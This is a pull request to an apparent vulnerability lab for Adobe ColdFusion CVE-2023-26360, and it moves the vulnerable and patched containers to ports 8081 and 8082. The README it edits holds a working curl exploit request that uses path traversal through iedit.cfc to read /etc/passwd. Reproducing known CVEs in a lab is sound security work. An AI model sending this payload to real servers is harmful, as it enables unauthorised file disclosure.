### PR TITLE
Coldfusion CVE-2023-26360 Docker Compose Ports Change

### DIFF
--- a/adobe/coldfusion/CVE-2023-26360/README.md
+++ b/adobe/coldfusion/CVE-2023-26360/README.md
@@ -4,6 +4,13 @@ Adobe ColdFusion is a commercial rapid web-application development computing pla
 
 Adobe ColdFusion versions 2018 Update 15 (and earlier) and 2021 Update 5 (and earlier) are affected by an Improper Access Control vulnerability that could result in local file inclusion and arbitrary code execution in the context of the current user.
 
+## Start Vulnerable and Non-Vulnerable Versions
+```bash
+docker compose up
+```
+
+The services will be exposed on https://127.0.0.1:8081 (vuln) and https://127.0.0.1:8082 (safe).
+
 ## Vulnerable Version
 ### Setup
 Start a Adobe ColdFusion 2018.0.15:
@@ -32,8 +39,8 @@ sh cfstart.sh
 Send the following request to the server to retrieve `/etc/passwd`:
 
 ```bash
-curl -X POST "http://127.0.0.1:8500/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=foo&_cfclient=true" \
-     -H "Host: 127.0.0.1:8500" \
+curl -X POST "http://127.0.0.1:8081/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=foo&_cfclient=true" \
+     -H "Host: 127.0.0.1:8081" \
      -H "Content-Type: application/x-www-form-urlencoded" \
      --data "_variables={\"_metadata\":{\"classname\":\"../../../../../../../../etc/passwd\"}}"
 ```
@@ -72,7 +79,7 @@ Start a Adobe ColdFusion 2018.0.15:
 docker compose up -d safe
 ```
 
-After a few minutes wait, visit `http://127.0.0.1:8500/CFIDE/administrator/index.cfm` with password `vulhub` check if  Adobe ColdFusion has installed successfully.
+After a few minutes wait, visit `http://127.0.0.1:8082/CFIDE/administrator/index.cfm` with password `vulhub` check if  Adobe ColdFusion has installed successfully.
 
 If it is still not working, please reset the password manually:
 ```bash
@@ -92,8 +99,8 @@ sh cfstart.sh
 Send the following request to the server to attempt to retrieve `/etc/passwd`:
 
 ```bash
-curl -X POST "http://127.0.0.1:8500/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=foo&_cfclient=true" \
-     -H "Host: 127.0.0.1:8500" \
+curl -X POST "http://127.0.0.1:8082/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=foo&_cfclient=true" \
+     -H "Host: 127.0.0.1:8082" \
      -H "Content-Type: application/x-www-form-urlencoded" \
      --data "_variables={\"_metadata\":{\"classname\":\"../../../../../../../../etc/passwd\"}}"
 ```

--- a/adobe/coldfusion/CVE-2023-26360/docker-compose.yml
+++ b/adobe/coldfusion/CVE-2023-26360/docker-compose.yml
@@ -4,8 +4,12 @@ services:
     environment:
       - password=vulhub
       - acceptEULA=YES
+    ports:
+      - 8081:8500
   safe:
     image: adobecoldfusion/coldfusion:latest
     environment:
       - password=vulhub
       - acceptEULA=YES
+    ports:
+      - 8082:8500


### PR DESCRIPTION
This change makes it so that the docker-compose services use different ports on the host. It makes it a little easier for testing.